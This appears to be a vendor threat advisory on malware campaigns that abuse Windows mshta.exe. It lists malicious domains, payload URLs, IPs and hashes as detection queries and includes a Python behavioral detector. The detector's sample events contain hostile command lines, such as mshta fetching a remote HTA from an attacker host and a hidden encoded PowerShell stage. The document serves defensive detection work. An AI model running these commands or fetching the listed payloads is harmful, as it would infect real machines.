Microsoft’s MSHTA Legacy Tool Still Powers Malware Campaigns on Windows

    Date: 05/20/2026

    Severity: High

    Summary

    Threat actors continue to abuse MSHTA (mshta.exe), a legacy Windows utility and Living-off-the-Land binary (LOLBIN), to execute malicious VBScript and JavaScript code while blending into legitimate system activity. The tool is being used across a wide range of campaigns, from commodity malware such as stealers and loaders to more advanced threats, often through multi-stage fileless attack chains involving PowerShell and HTA scripts. Combined with social engineering techniques like fake software downloads and ClickFix lures, MSHTA remains a significant attack vector despite its legacy status. 

    Indicators of Compromise (IOC) List 


    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1:

    domainname like "fileless-market.cc" or url like "fileless-market.cc" or siteurl like "fileless-market.cc" or domainname like "s5-microservice-updatehub.cc" or url like "s5-microservice-updatehub.cc" or siteurl like "s5-microservice-updatehub.cc" or domainname like "https://solve.gevaq.com/awjxs.captcha?u=a1bdaa0d-6aab-4d96-bafe-483ef5eb8cae" or url like "https://solve.gevaq.com/awjxs.captcha?u=a1bdaa0d-6aab-4d96-bafe-483ef5eb8cae" or siteurl like "https://solve.gevaq.com/awjxs.captcha?u=a1bdaa0d-6aab-4d96-bafe-483ef5eb8cae" or domainname like "https://echoicedeals.shop/s6.mp3" or url like "https://echoicedeals.shop/s6.mp3" or siteurl like "https://echoicedeals.shop/s6.mp3" or domainname like "some-othertag.cc" or url like "some-othertag.cc" or siteurl like "some-othertag.cc" or domainname like "https://kizmond.shop/riiw1.mp4" or url like "https://kizmond.shop/riiw1.mp4" or siteurl like "https://kizmond.shop/riiw1.mp4" or domainname like "https://simplerwebs.world/mine.json" or url like "https://simplerwebs.world/mine.json" or siteurl like "https://simplerwebs.world/mine.json" or domainname like "urugvai.cc" or url like "urugvai.cc" or siteurl like "urugvai.cc" or domainname like "hell4-kitty.cc" or url like "hell4-kitty.cc" or siteurl like "hell4-kitty.cc" or domainname like "msedge.vg" or url like "msedge.vg" or siteurl like "msedge.vg" or domainname like "holiday-forever.cc" or url like "holiday-forever.cc" or siteurl like "holiday-forever.cc" or domainname like "hell3-kitty.cc" or url like "hell3-kitty.cc" or siteurl like "hell3-kitty.cc" or domainname like "globalsnn1-new.cc" or url like "globalsnn1-new.cc" or siteurl like "globalsnn1-new.cc" or domainname like "azure-s3-bucket.cc" or url like "azure-s3-bucket.cc" or siteurl like "azure-s3-bucket.cc" or domainname like "parent-control.cc" or url like "parent-control.cc" or siteurl like "parent-control.cc" or domainname like "https://d1.pool4883.pw/win/hssl/r7.hta" or url like 
"https://d1.pool4883.pw/win/hssl/r7.hta" or siteurl like "https://d1.pool4883.pw/win/hssl/r7.hta" or domainname like "holiday-updateservice.com" or url like "holiday-updateservice.com" or siteurl like "holiday-updateservice.com" or domainname like "bigbrainsholdings.com" or url like "bigbrainsholdings.com" or siteurl like "bigbrainsholdings.com" or domainname like "globalsnn2-new.cc" or url like "globalsnn2-new.cc" or siteurl like "globalsnn2-new.cc" or domainname like "web3-walletnotify.cc" or url like "web3-walletnotify.cc" or siteurl like "web3-walletnotify.cc" or domainname like "http://185.147.124.40/Capcha.html" or url like "http://185.147.124.40/Capcha.html" or siteurl like "http://185.147.124.40/Capcha.html" or domainname like "hell5-kitty.cc" or url like "hell5-kitty.cc" or siteurl like "hell5-kitty.cc" or domainname like "memory-protection-layer1.cc" or url like "memory-protection-layer1.cc" or siteurl like "memory-protection-layer1.cc" or domainname like "sentinel1-endpoint-security.cc" or url like "sentinel1-endpoint-security.cc" or siteurl like "sentinel1-endpoint-security.cc" or domainname like "health-smooth-eu2.com" or url like "health-smooth-eu2.com" or siteurl like "health-smooth-eu2.com" or domainname like "domain-monitoring.cc" or url like "domain-monitoring.cc" or siteurl like "domain-monitoring.cc" or domainname like "https://recaptcha-process.com/recaptcha-verify.html" or url like "https://recaptcha-process.com/recaptcha-verify.html" or siteurl like "https://recaptcha-process.com/recaptcha-verify.html" or domainname like "forest-entity.cc" or url like "forest-entity.cc" or siteurl like "forest-entity.cc" or domainname like "microservice-update-s1-bucket.cc" or url like "microservice-update-s1-bucket.cc" or siteurl like "microservice-update-s1-bucket.cc" or domainname like "s1-microservice-updatehub.cc" or url like "s1-microservice-updatehub.cc" or siteurl like "s1-microservice-updatehub.cc" or domainname like "silverhost.vg" or url like 
"silverhost.vg" or siteurl like "silverhost.vg" or domainname like "hell10-kitty.cc" or url like "hell10-kitty.cc" or siteurl like "hell10-kitty.cc" or domainname like "msgrouppolicy.vg" or url like "msgrouppolicy.vg" or siteurl like "msgrouppolicy.vg" or domainname like "ccleaner.gl" or url like "ccleaner.gl" or siteurl like "ccleaner.gl" or domainname like "hosting-control.cc" or url like "hosting-control.cc" or siteurl like "hosting-control.cc"

    Detection Query 2:

    domainname like "acio-patron.cc" or url like "acio-patron.cc" or siteurl like "acio-patron.cc" or domainname like "hell2-kitty.cc" or url like "hell2-kitty.cc" or siteurl like "hell2-kitty.cc" or domainname like "my-smart-house1.com" or url like "my-smart-house1.com" or siteurl like "my-smart-house1.com" or domainname like "health-smooth-eu3.com" or url like "health-smooth-eu3.com" or siteurl like "health-smooth-eu3.com" or domainname like "network-defender.cc" or url like "network-defender.cc" or siteurl like "network-defender.cc" or domainname like "hell8-kitty.cc" or url like "hell8-kitty.cc" or siteurl like "hell8-kitty.cc" or domainname like "hell9-kitty.cc" or url like "hell9-kitty.cc" or siteurl like "hell9-kitty.cc" or domainname like "https://buck2nd.oss-eu-central-1.aliyuncs.com/dir/sixth/singl6.mp4" or url like "https://buck2nd.oss-eu-central-1.aliyuncs.com/dir/sixth/singl6.mp4" or siteurl like "https://buck2nd.oss-eu-central-1.aliyuncs.com/dir/sixth/singl6.mp4" or domainname like "https://scrutinycheck.cash/singl5.mp4" or url like "https://scrutinycheck.cash/singl5.mp4" or siteurl like "https://scrutinycheck.cash/singl5.mp4" or domainname like "s3-microservice-updatehub.cc" or url like "s3-microservice-updatehub.cc" or siteurl like "s3-microservice-updatehub.cc" or domainname like "deluxe.gl" or url like "deluxe.gl" or siteurl like "deluxe.gl" or domainname like "alpha-centavr.cc" or url like "alpha-centavr.cc" or siteurl like "alpha-centavr.cc" or domainname like "s10-microservice-updatehub.cc" or url like "s10-microservice-updatehub.cc" or siteurl like "s10-microservice-updatehub.cc" or domainname like "alphazero1-endscape.cc" or url like "alphazero1-endscape.cc" or siteurl like "alphazero1-endscape.cc" or domainname like "hardware-office.cc" or url like "hardware-office.cc" or siteurl like "hardware-office.cc" or domainname like "immortal-service.cc" or url like "immortal-service.cc" or siteurl like "immortal-service.cc" or domainname like 
"hell7-kitty.cc" or url like "hell7-kitty.cc" or siteurl like "hell7-kitty.cc" or domainname like "geo-foundation.vg" or url like "geo-foundation.vg" or siteurl like "geo-foundation.vg" or domainname like "https://etrademart.shop/s6.mp3" or url like "https://etrademart.shop/s6.mp3" or siteurl like "https://etrademart.shop/s6.mp3" or domainname like "py-installer.cc" or url like "py-installer.cc" or siteurl like "py-installer.cc" or domainname like "https://antibot-check.icu/Capcha.html" or url like "https://antibot-check.icu/Capcha.html" or siteurl like "https://antibot-check.icu/Capcha.html" or domainname like "https://macphotoeditor.shop/singl6.mp4" or url like "https://macphotoeditor.shop/singl6.mp4" or siteurl like "https://macphotoeditor.shop/singl6.mp4" or domainname like "memory-scanner.cc" or url like "memory-scanner.cc" or siteurl like "memory-scanner.cc" or domainname like "files-storage.cc" or url like "files-storage.cc" or siteurl like "files-storage.cc" or domainname like "hell6-kitty.cc" or url like "hell6-kitty.cc" or siteurl like "hell6-kitty.cc" or domainname like "s7-microservice-updatehub.cc" or url like "s7-microservice-updatehub.cc" or siteurl like "s7-microservice-updatehub.cc" or domainname like "http://92.255.57.155/Capcha.html" or url like "http://92.255.57.155/Capcha.html" or siteurl like "http://92.255.57.155/Capcha.html" or domainname like "s8-microservice-updatehub.cc" or url like "s8-microservice-updatehub.cc" or siteurl like "s8-microservice-updatehub.cc" or domainname like "https://checkpageonce.com/singl6.mp4" or url like "https://checkpageonce.com/singl6.mp4" or siteurl like "https://checkpageonce.com/singl6.mp4" or domainname like "http://us1.somepools555.pw/win/checking.hta" or url like "http://us1.somepools555.pw/win/checking.hta" or siteurl like "http://us1.somepools555.pw/win/checking.hta" or domainname like "s6-microservice-updatehub.cc" or url like "s6-microservice-updatehub.cc" or siteurl like "s6-microservice-updatehub.cc" 
or domainname like "https://onceletthemcheck.com/singl5.mp4" or url like "https://onceletthemcheck.com/singl5.mp4" or siteurl like "https://onceletthemcheck.com/singl5.mp4" or domainname like "https://simplerwebs.space/anrek.mp4" or url like "https://simplerwebs.space/anrek.mp4" or siteurl like "https://simplerwebs.space/anrek.mp4" or domainname like "https://retrosome.shop/ru2-2.eml" or url like "https://retrosome.shop/ru2-2.eml" or siteurl like "https://retrosome.shop/ru2-2.eml"

    Detection Query 3:

    domainname like "https://solve.jenj.org/awjxs.captcha?u=8508de42-23ab-4b24-aa95-eda5feae86e8" or url like "https://solve.jenj.org/awjxs.captcha?u=8508de42-23ab-4b24-aa95-eda5feae86e8" or siteurl like "https://solve.jenj.org/awjxs.captcha?u=8508de42-23ab-4b24-aa95-eda5feae86e8" or domainname like "critical-service.cc" or url like "critical-service.cc" or siteurl like "critical-service.cc" or domainname like "indeanapolice.cc" or url like "indeanapolice.cc" or siteurl like "indeanapolice.cc" or domainname like "https://topofsuper.shop/re5.mp4" or url like "https://topofsuper.shop/re5.mp4" or siteurl like "https://topofsuper.shop/re5.mp4" or domainname like "https://asq.d6shiiwz.pw/win/hssl/d6.hta" or url like "https://asq.d6shiiwz.pw/win/hssl/d6.hta" or siteurl like "https://asq.d6shiiwz.pw/win/hssl/d6.hta" or domainname like "https://savecoupons.store/s7.mp4" or url like "https://savecoupons.store/s7.mp4" or siteurl like "https://savecoupons.store/s7.mp4" or domainname like "https://driftcharm.shop/S6.mp4" or url like "https://driftcharm.shop/S6.mp4" or siteurl like "https://driftcharm.shop/S6.mp4" or domainname like "https://thepremiumstuffs.shop/s5.mp4" or url like "https://thepremiumstuffs.shop/s5.mp4" or siteurl like "https://thepremiumstuffs.shop/s5.mp4" or domainname like "ms-team-ping6.com" or url like "ms-team-ping6.com" or siteurl like "ms-team-ping6.com" or domainname like "hell1-kitty.cc" or url like "hell1-kitty.cc" or siteurl like "hell1-kitty.cc" or domainname like "offshore-storage.cc" or url like "offshore-storage.cc" or siteurl like "offshore-storage.cc" or domainname like "explorer.vg" or url like "explorer.vg" or siteurl like "explorer.vg" or domainname like "globalsnn3-new.cc" or url like "globalsnn3-new.cc" or siteurl like "globalsnn3-new.cc" or domainname like "s4-microservice-updatehub.cc" or url like "s4-microservice-updatehub.cc" or siteurl like "s4-microservice-updatehub.cc" or domainname like "system-monitor.cc" or url like 
"system-monitor.cc" or siteurl like "system-monitor.cc" or domainname like "communicationfirewall-security.cc" or url like "communicationfirewall-security.cc" or siteurl like "communicationfirewall-security.cc" or domainname like "https://asd.s7610rir.pw/win/checking.hta" or url like "https://asd.s7610rir.pw/win/checking.hta" or siteurl like "https://asd.s7610rir.pw/win/checking.hta" or domainname like "debank-api.cc" or url like "debank-api.cc" or siteurl like "debank-api.cc" or domainname like "https://pawpaws.readit-carfanatics.com/madonna.mp4" or url like "https://pawpaws.readit-carfanatics.com/madonna.mp4" or siteurl like "https://pawpaws.readit-carfanatics.com/madonna.mp4" or domainname like "microservice.gl" or url like "microservice.gl" or siteurl like "microservice.gl" or domainname like "s9-microservice-updatehub.cc" or url like "s9-microservice-updatehub.cc" or siteurl like "s9-microservice-updatehub.cc" or domainname like "https://propofgustestyle.info/recaptcha-verify.html" or url like "https://propofgustestyle.info/recaptcha-verify.html" or siteurl like "https://propofgustestyle.info/recaptcha-verify.html" or domainname like "s3-updatehub.cc" or url like "s3-updatehub.cc" or siteurl like "s3-updatehub.cc" or domainname like "holypriest.gl" or url like "holypriest.gl" or siteurl like "holypriest.gl" or domainname like "https://denek.local-wanderer.shop/RIWZ.mp4" or url like "https://denek.local-wanderer.shop/RIWZ.mp4" or siteurl like "https://denek.local-wanderer.shop/RIWZ.mp4" or domainname like "google-services.cc" or url like "google-services.cc" or siteurl like "google-services.cc" or domainname like "https://macphotoeditor.shop/singl5.mp4" or url like "https://macphotoeditor.shop/singl5.mp4" or siteurl like "https://macphotoeditor.shop/singl5.mp4" or domainname like "microservice-update-s2-bucket.cc" or url like "microservice-update-s2-bucket.cc" or siteurl like "microservice-update-s2-bucket.cc" or domainname like "s2-microservice-updatehub.cc" 
or url like "s2-microservice-updatehub.cc" or siteurl like "s2-microservice-updatehub.cc" or domainname like "https://triptrip.melody-wave.shop/re2.mp4" or url like "https://triptrip.melody-wave.shop/re2.mp4" or siteurl like "https://triptrip.melody-wave.shop/re2.mp4" or domainname like "polystore9-servicebucket.cc" or url like "polystore9-servicebucket.cc" or siteurl like "polystore9-servicebucket.cc" or domainname like "https://klipjaqemiu.shop/web44.mp4" or url like "https://klipjaqemiu.shop/web44.mp4" or siteurl like "https://klipjaqemiu.shop/web44.mp4" or domainname like "https://check.qlkwr.com/awjsx.captcha?u=03cb013e-aa4a-439e-86af-c3319c7b5dc0" or url like "https://check.qlkwr.com/awjsx.captcha?u=03cb013e-aa4a-439e-86af-c3319c7b5dc0" or siteurl like "https://check.qlkwr.com/awjsx.captcha?u=03cb013e-aa4a-439e-86af-c3319c7b5dc0" or domainname like "fileless-storage-s3.cc" or url like "fileless-storage-s3.cc" or siteurl like "fileless-storage-s3.cc"

    Detection Query 4:

    dstipaddress IN ("103.55.70.212","185.208.159.199","61.147.108.92","58.221.252.210","103.36.223.87","103.115.17.90","157.66.153.154","89.117.2.159","187.102.48.229","222.73.29.92","122.165.219.142","110.42.51.229","60.173.116.152","100.1.121.27","103.113.195.244","87.96.21.84","110.45.196.155","103.83.212.194","107.175.187.11","173.208.166.226","156.224.232.98","201.138.238.195","61.136.101.152","204.44.110.216","190.111.12.242","193.112.70.226") or srcipaddress IN ("103.55.70.212","185.208.159.199","61.147.108.92","58.221.252.210","103.36.223.87","103.115.17.90","157.66.153.154","89.117.2.159","187.102.48.229","222.73.29.92","122.165.219.142","110.42.51.229","60.173.116.152","100.1.121.27","103.113.195.244","87.96.21.84","110.45.196.155","103.83.212.194","107.175.187.11","173.208.166.226","156.224.232.98","201.138.238.195","61.136.101.152","204.44.110.216","190.111.12.242","193.112.70.226")

    Detection Query 5:

    sha256hash IN ("38FE562136ADE372FC4CEDDE67826AEEA8404E93A54A4A4736DDB4C8C8D4C96D","1E0E375F3EE82D5AF5DFE6F7DF0E2FAC9A7D37C67ADD3390D05A93AFD85B7C84","02630FA994B1566AD1515FD87220FC037B967F07495985A3637D68D7E08C57EE","7D0487AFC91B0FE8B2FBF732AB54C3C07E86BF69471BBA6C283AABEA190499BA","AA845A8FB4AB38AEBE6A16A2A8F80CA4467AC0991D3EEF4D8A10BDF97DEDB1E9","333E2192F2551415659FB4094E81B911708921BB588EECF65E27F51C9938DFC2")
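The five queries above match the advisory's indicators exactly, so they go quiet as soon as the operators rotate domains. As an added example (not part of the advisory or of Gurucul's TDIR content), the Python below applies the behavioral traits the summary describes to process-creation telemetry: mshta.exe fetching remote content, mshta.exe started from a user-facing parent as in ClickFix and fake-download lures, and mshta.exe spawning PowerShell as the fileless second stage. The event shape and the sample events are constructed assumptions; the two indicator domains are taken from the list above.

```python
# Behavioral triage of process-creation events for MSHTA abuse.
# Hypothetical example: the event shape and the sample events are constructed,
# not taken from the advisory or from real telemetry.
import re
from dataclasses import dataclass

# Remote sources mshta can pull an HTA or script from (http(s), ftp, UNC share).
REMOTE_RE = re.compile(r"(https?|ftp)://|\\\\[\w.-]+\\", re.IGNORECASE)
# Protocol handlers that hand mshta an inline script body instead of a file.
INLINE_RE = re.compile(r"\b(vbscript|javascript):", re.IGNORECASE)
# Parents implying a person or a browser started it (ClickFix, fake-download lures).
USER_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Children that turn the HTA into a fileless second stage.
STAGE_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Two domains from the advisory's indicator list; a real deployment loads the full list.
IOC_DOMAINS = {"us1.somepools555.pw", "hell1-kitty.cc"}


@dataclass
class ProcEvent:  # minimal Sysmon Event ID 1 / EDR process-creation record
    image: str
    parent_image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def mshta_findings(ev: ProcEvent) -> list[str]:
    """Return every reason the event looks like MSHTA abuse ([] when clean)."""
    reasons = []
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    cmd = ev.command_line
    if image == "mshta.exe":
        if REMOTE_RE.search(cmd):
            reasons.append("remote content source on command line")
        if INLINE_RE.search(cmd):
            reasons.append("inline script via protocol handler")
        if parent in USER_PARENTS:
            reasons.append(f"launched from {parent} (user/browser initiated)")
        if any(d in cmd.lower() for d in IOC_DOMAINS):
            reasons.append("known indicator domain")
    elif parent == "mshta.exe" and image in STAGE_CHILDREN:
        reasons.append(f"mshta spawned {image} (fileless second stage)")
    return reasons


SAMPLE_EVENTS = [  # constructed, illustrative only
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              "mshta.exe http://us1.somepools555.pw/win/checking.hta"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              'mshta vbscript:Close(MsgBox("test"))'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\mshta.exe", "powershell.exe -w hidden -enc AAAA"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\msiexec.exe",
              r'mshta.exe "C:\Program Files\Vendor\setup.hta"'),  # benign installer use
]


def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> findings for every event that produced at least one."""
    return {i: f for i, ev in enumerate(events) if (f := mshta_findings(ev))}
```

The installer-launched local HTA produces no finding, which is the false-positive case an exact-match query never has to think about but a behavioral rule must.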

    Reference:

    https://www.bitdefender.com/en-us/blog/labs/microsofts-mshta-legacy-malware-windows


    Tags

    Malware, Microsoft, MSHTA, LOLBins, Stealer, Social Engineering, ClickFix
